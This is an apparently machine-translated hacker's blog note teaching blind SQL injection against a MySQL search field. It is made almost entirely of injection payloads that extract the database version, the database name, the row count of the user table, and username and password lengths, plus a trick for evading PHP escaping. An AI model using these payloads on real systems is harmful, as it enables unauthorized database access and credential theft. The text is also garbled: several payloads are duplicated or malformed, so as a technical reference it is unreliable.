MySQL search-type blind note Note

A Daniel encountered a search-type injection, and the tool was not easy to run, so he made a hand together, but I was a fool. After reading the literature and carefully mentioning it, write this note, just like other blind injection methods, to inject = by judging the page echo. = The injection point reports the following error: it is known by the error that this is a Mysql database.0 × 01-determine the database versionUse left () to intercept the Statement % 'and (SELECT left (version (), 1) & gt; 4) and '%' = '/* echo normal */%' and (SELECT left (version (), 1) & gt; 6) and '%' = '/* echo Error */%' and (SELECT left (version (), 1) = 5) and '%' = '/* echo normal */If> 4, Echo normal indicates that version is greater than 4. If it is greater than 6, Echo error occurs. Check that version is 5.0 × 02-determine the database Length % 'And (SELECT length (database () & gt; 1) and' % '='/* echo normal */% 'and (SELECT length (database ()) & gt; 4) and '%' = '/* echo Error */%' and (SELECT length (database () = 4) and '%' = '/* echo normal */by ECHO, it is estimated that the database length is 4

 0 × 03-name of the database to be guessed% 'And (SELECT left (database (), 1) & gt; '1' and' % '=' % 'and (SELECT left (database (), 1 )) & gt; '1' and '%' = '%' and (SELECT left (database (), 1 )) = 'p' and '%' = 'P % 'and (SELECT left (database (), 2 )) = 'Ph 'and' % '= 'Ph %' and (SELECT left (database (), 3 )) = 'php' and '%' = 'php % 'and (SELECT left (database (), 4 )) = 'phpx 'and' % '=' Here, we use the classic half method to guess % 'and (SELECT left (database (), 1) & gt; '1' and '%' = '/* echo normal */%' and (SELECT left (database (), 1 )) & Gt; '9' and '%' = '/* echo normal * // * the first character is not a number */%' and (SELECT left (database (), 1) & gt; 'A' and '%' = '/* echo normal */%' and (SELECT left (database (), 1) & gt; 'Z' and '%' = '/* echo Error * // * start to half */%' and (SELECT left (database (), 1) & gt; 'M' and '%' = '/* echo normal description between m-z */%' and (SELECT left (database (), 1) & gt; 'R' and '%' = '/* echo error Description between m-r */%' and (SELECT left (database (), 1 )) = 'p' and '%' = '/* echo normal, identified as p */%' and (SELECT left (database (), 2 )) = 'Ph 'and' %' = '/* If ECHO is normal, the second character is h */............ According to the split-half method mentioned above, the database name is phpx.0 × 04-guessing Field% 'And (select count (username) from user) & gt; 0 and' % '= 'Total number in the user table %' and (select count (*) from user) & gt; 2 and '%' = '/* echo Error */%' and (select count (*) from user) & gt; 1 and '%' = '/* echo correct */%' and (select count (*) from user) = 2 and '%' = '/* echo correct, there are two methods for */password cracking.0 × 05-guess the length of username% 'And (select length (username) from user limit 0, 1) from user limit 0, 1) & gt; 0 and '%' = '/* the ECHO is correct */%' and (select length (username) from user limit 0, 1) from user limit 0, 1) & gt; 9 and '%' = '/* echo correct */%' and (select length (username) from user limit 0, 1) from user limit 0, 1) & gt; 10 and '%' = '/* echo Error */%' and (select length (username) from user limit 0, 1) from user limit 0, 1) = 10 and '%' = '/* the ECHO is correct, indicating that the first username has 10 digits */%' and (select length (username) from user limit) from user limit) & gt; 0 and '%' = '/* the ECHO is correct, and the second digit is also 10 digits */0 × 06-guess solution ValueIt is too hard to guess the solution value. You can use burpsuite to continuously submit the post and guess the solution. The methods are the same.0 × 07-passwordThe method is the same as the method used to guess username.0 × 08-special characters and avoiding GPC escaping in phpIf special characters are encountered, the substr function can be used here. For more information, see the manual, for example, see Xi Ke's article to avoid GPC escaping select substr (left (select user from ebt_user), 1),) = char (48) % 'and (SELECT left (version (), 1) = 5) and' % '=' Finally, thanks to the help of crazy guy, his blog is http://fuck.0day5.com